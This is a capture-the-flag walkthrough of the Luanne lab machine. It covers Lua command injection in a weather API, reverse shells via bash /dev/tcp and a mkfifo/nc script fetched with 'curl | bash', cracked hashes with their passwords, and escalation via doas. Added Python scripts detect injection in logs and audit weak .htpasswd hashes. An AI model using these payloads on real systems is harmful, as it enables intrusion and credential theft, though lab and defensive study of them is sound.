Luanne is a retired vulnerable machine running the NetBSD operating system. After detecting and exploiting its vulnerabilities, we are expected to obtain the user and root flags.
We start with an nmap scan to identify the services on the target machine.
Classic Scan
Full Port Scan
The port scan shows three open ports: 22/tcp ssh (OpenSSH 8.0), 80/tcp http (nginx 1.19.0) and 9001/tcp http (Medusa httpd 1.12).
Since there is no vulnerability on the ssh side, we continue with port 80.
Since port 80 serves HTTP, we continue enumeration in the browser.
When we try to log in, it keeps asking for credentials; we tried default credentials and could not log in.
We cancelled the prompt and tried again.
Here it redirects to port 3000.
Not much of a result here.
Let’s run a directory and file scan with gobuster.
The directory scan returned the /robots.txt file.
We open /robots.txt.
The /robots.txt file mentions /weather as a path to harvest.
We run a gobuster scan against this directory.
We discovered the /forecast directory.
We go to the /forecast directory.
Here it tells us to use city=list, with output in JSON format; let’s apply it in the URL.
This means we can get the server to run something for us. The cities are listed.
Now we query the cities one by one.
When I typed the city of London, the output was very detailed.
We continue to gather this information.
Since it may be associated with port 9001, let’s go to that port.
The same page asks for credentials on this port too. Since Medusa/1.12 is specifically running on this port, let’s Google whether it has a default password.
Entering this information was not successful.
A different source gave us different credentials, and we were able to log in with them.
The page shows uptime, processes and memory. In the process section, a file with the .lua extension draws our attention.
Let’s investigate this .lua file and find out what it is.
We see that Lua is a programming language and that we can run commands on the web service; if we search for a Lua reverse shell, maybe we can get a shell on the server.
We searched Google for a Lua reverse shell.
We try it on the URL we saw to get a shell.
We get an error that the JSON cannot be parsed properly.
Let’s try to execute a command while listening in the background, using Burp Suite.
We can’t run any kind of command here.
Let’s see if there is command injection through Lua.
os.execute("id")
When we try this, it returns the output of id.
We type our reverse shell command, and no result is returned.
os.execute("bash -i >& /dev/tcp/10.10.14.13/1234 0>&1")
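From the defender’s side, the probes above leave a clear trace in the web server’s access log: a city name never contains os.execute or io.popen. The following script is an added example for this write-up, not code from the original post or from the target; it parses nginx combined-format log lines, percent-decodes the query string and flags any parameter carrying a Lua execution primitive. The log lines are constructed (client IP from the TEST-NET range, timestamps invented), and the watch-list of Lua calls is an assumed set, not anything taken from the target’s application.

```python
"""Flag Lua-execution primitives inside query parameters of nginx access logs.

Added example for this write-up, not code from the original post or the target.
The log lines are constructed, and the token list is an assumed set of Lua
primitives that should never appear in a legitimate city name.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed watch-list: Lua calls that execute commands or load code.
LUA_EXEC_TOKENS = (
    "os.execute", "io.popen", "io.open", "loadstring(", "load(", "dofile(",
)

# Constructed sample log; the third line carries the os.execute("id") probe from the write-up.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Sep/2020:10:00:01 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 512 "-" "curl/7.72.0"
192.0.2.10 - - [16/Sep/2020:10:00:05 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 1480 "-" "curl/7.72.0"
192.0.2.10 - - [16/Sep/2020:10:01:12 +0000] "GET /weather/forecast?city=os.execute(%22id%22) HTTP/1.1" 500 0 "-" "curl/7.72.0"
192.0.2.10 - - [16/Sep/2020:10:01:40 +0000] "GET /weather/forecast?city=io.popen(%27id%27) HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Sep/2020:10:02:03 +0000] "GET /weather/forecast?city=San+Francisco HTTP/1.1" 200 1502 "-" "curl/7.72.0"
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes and turns '+' into spaces, so encoded payloads are normalised.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return (param_name, matched_token) for every parameter containing a watch-listed call."""
    hits = []
    for name, value in params:
        low = value.lower()
        for tok in LUA_EXEC_TOKENS:
            if tok in low:
                hits.append((name, tok))
                break
    return hits


def scan_log(text):
    """Run the check over a whole log and return one finding per suspicious parameter."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        for name, tok in suspicious_params(rec["params"]):
            findings.append({
                "ip": rec["ip"], "time": rec["time"], "path": rec["path"],
                "param": name, "token": tok, "status": rec["status"],
            })
    return findings


def sources(findings):
    """Count findings per client IP, a simple basis for an alert threshold."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']} contains {f['token']!r} -> HTTP {f['status']}")
```

Decoding the query before matching matters: the probe arrives as `os.execute(%22id%22)`, and a check on the raw request line would still match here, but a payload that also percent-encodes the dots or letters would not. The bare `load(` token is the noisiest entry in the list (it also matches words such as `download(`), so tune the list against your own traffic before alerting on it.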
Let’s serve a reverse shell file instead and trigger it with curl.
First, we prepare the reverse shell as an sh file, i.e. a shell script:
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
Then we serve this file with a Python web server.
The shell is ready; now the target machine needs to fetch and run it.
We were able to do command injection on the Lua application, so now we open Burp Suite and fetch this script with curl:
curl+10.10.14.13:8000/shell.sh+|+bash
This is how we were able to get a shell 😊
This user has restricted privileges.
Let’s do local enumeration.
Let’s first carefully examine the www folder, since that is what this web service serves.
In the .htpasswd file we get a username and a hash.
Let’s check on CrackStation whether this hash has already been cracked.
As can be seen, the hash is cracked: $1$vVVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest
We could not log in with it, because there is no webapi_user user on the system.
These are the credentials the website asked us for when we first entered it; let’s try to log in with them.
We were able to log in.
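The $1$ prefix identifies md5crypt, a fast hash that a lookup site or hashcat recovers in seconds, which is exactly what happened here. An administrator can catch this before an attacker does by auditing the hash schemes in every .htpasswd file. The script below is an added example for this write-up, not code from the original post: it parses the user:hash lines, classifies each hash by its prefix and lists the accounts whose scheme is not acceptable. The sample file is constructed; its first line reuses the md5crypt entry recovered above, and the other hashes are placeholders that only need the right prefix.

```python
"""Audit an .htpasswd file for password-hash schemes that crack quickly.

Added example for this write-up, not code from the original post. The file
contents are constructed; the first line reuses the md5crypt ($1$) entry the
write-up recovered, the other hashes are placeholders with the right prefix.
"""

# (prefix, scheme name, acceptable?) checked in order; first matching prefix wins.
SCHEMES = (
    ("$2y$", "bcrypt", True),
    ("$2b$", "bcrypt", True),
    ("$2a$", "bcrypt", True),
    ("$6$", "sha512crypt", True),
    ("$5$", "sha256crypt", True),
    ("$apr1$", "apr1-md5", False),
    ("$1$", "md5crypt", False),
    ("{SHA}", "sha1-unsalted", False),
)

# Constructed sample .htpasswd; only the webapi_user hash comes from the write-up.
SAMPLE_HTPASSWD = """\
# constructed sample file
webapi_user:$1$vVVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
legacy:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
ops:$apr1$PLACEHOL$PLACEHOLDERPLACEHOLDERX
admin:$2y$10$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHO

olduser:AbCdEfGhIjKlM
"""


def classify(hash_value):
    """Return (scheme name, acceptable) for one hash string."""
    for prefix, name, ok in SCHEMES:
        if hash_value.startswith(prefix):
            return name, ok
    # No recognised prefix: traditional DES crypt or a plaintext password, both unacceptable.
    return "crypt-or-plaintext", False


def parse_htpasswd(text):
    """Yield (user, hash) pairs, skipping blank lines and comments; reject malformed lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: expected user:hash")
        user, hash_value = line.split(":", 1)  # hashes never contain ':', but split once anyway
        entries.append((user, hash_value))
    return entries


def audit(text):
    """Classify every account in the file."""
    report = []
    for user, hash_value in parse_htpasswd(text):
        scheme, ok = classify(hash_value)
        report.append({"user": user, "scheme": scheme, "acceptable": ok})
    return report


def weak_accounts(text):
    """Accounts whose hash scheme should be re-hashed (e.g. with htpasswd -B for bcrypt)."""
    return [r["user"] for r in audit(text) if not r["acceptable"]]


if __name__ == "__main__":
    for r in audit(SAMPLE_HTPASSWD):
        flag = "OK  " if r["acceptable"] else "WEAK"
        print(f"{flag} {r['user']:<12} {r['scheme']}")
```

The check is deliberately prefix-only, so it runs on any file without needing the crypt library; re-hashing the flagged accounts (Apache’s `htpasswd -B` writes bcrypt) is the fix, and the file itself should not live under the web root in the first place.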
/weather/forecast?city=list
/weather/forecast?city=London
These addresses return the same information we found during enumeration, so there was no advantage for us.
We continue with local enumeration. Since the shell is sh, we couldn’t run the automated enumeration tools, which are limited in most cases anyway.
So we enumerate manually.
We look at the active network connections.
We look at the processes that use these ports.
Here we were able to obtain the SSH key.
Now we will make an SSH connection using this key.
The file devel_backup-2020-09-16.tar.gz.enc catches our attention.
We don’t know how to open this file, so we search Google.
Let’s adapt it according to the reference here and print the output.
Here we have a different hash value.
Let’s crack this hash value too, with hashcat.
We cracked the hash and got the password littlebear.
Here I try to become root; commands such as sudo su do not work because it is an OpenBSD operating system, so we researched on Google how we can become root.
We came across the doas command; let’s try it.
As you can see, we were able to get our root flag here.